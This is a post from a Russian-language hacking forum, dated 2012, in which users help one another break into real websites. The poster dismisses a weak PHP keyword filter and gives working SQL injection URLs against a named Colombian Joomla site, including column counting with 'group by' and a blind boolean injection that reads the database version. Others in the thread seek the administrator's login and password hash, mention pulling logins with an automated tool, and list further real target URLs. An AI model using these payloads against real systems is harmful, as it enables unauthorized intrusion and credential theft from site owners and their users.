Показать сообщение отдельно

  #20897  
Старый 25.06.2012, 08:00
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от RazyKK  
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>",
"INSERT", "UPDATE", "DROP"
);
$replace = array("");
Прикольно =)

Цитата:
Сообщение от A_n_d_r_e_i  
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+or der+by+1--+
в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа
Код:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+group+by+11#
При union+select сайт зависает. А при union(select(1),2,3,4,5,6,7,8,9,10,11) не зависает, но false. При uniunionon, selselectect так же false. Поэтому:

Код:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+substring((select+version()),1,1)=5+and+'1'='1
=)

Цитата:
Сообщение от A_n_d_r_e_i  
Да, у меня тоже( С помощью хавиж достал, но только логины
А что помешало достать пароли?

Цитата:
Сообщение от A_n_d_r_e_i  
http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3
http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=1 5
Com_wrapper, даже смотреть не буду
 
Ответить с цитированием